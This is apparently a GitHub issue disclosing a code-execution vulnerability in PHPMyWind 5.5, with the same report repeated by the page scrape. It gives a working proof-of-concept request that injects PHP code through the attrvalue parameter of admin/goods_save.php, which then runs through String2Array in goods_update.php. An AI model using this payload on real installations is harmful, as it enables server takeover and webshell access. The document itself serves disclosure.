phpmywind5.5 Code Execution1

### Attackers can get webshell or code execution 
### 1.First download the phpmywind the Latest version from [http://phpmywind.com/downloads/PHPMyWind_5.5.zip](url)
### 2.install it 
### 3.login as Admin
### 4.request http://localhost/admin/goods_save.php?action=add&attrid[]=1&attrvalue[]=2");phpinfo();//
### 5.then request http://localhost/admin/goods_update.php?id=2 
![3](https://user-images.githubusercontent.com/42397796/44140084-a395d362-a0ab-11e8-834e-4f5ea8d04e64.png)

In summary:  from admin/goods_save.php Insert data into database and then from admin/goods_update.php enter the String2Array function  and code execution :)


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

phpmywind5.5 Code Execution1 #4

Attackers can get webshell or code execution

1.First download the phpmywind the Latest version from http://phpmywind.com/downloads/PHPMyWind_5.5.zip

2.install it

3.login as Admin

4.request http://localhost/admin/goods_save.php?action=add&attrid[]=1&attrvalue[]=2");phpinfo();//

5.then request http://localhost/admin/goods_update.php?id=2

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

phpmywind5.5 Code Execution1 #4

Description

Attackers can get webshell or code execution

1.First download the phpmywind the Latest version from http://phpmywind.com/downloads/PHPMyWind_5.5.zip

2.install it

3.login as Admin

4.request http://localhost/admin/goods_save.php?action=add&attrid[]=1&attrvalue[]=2");phpinfo();//

5.then request http://localhost/admin/goods_update.php?id=2

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions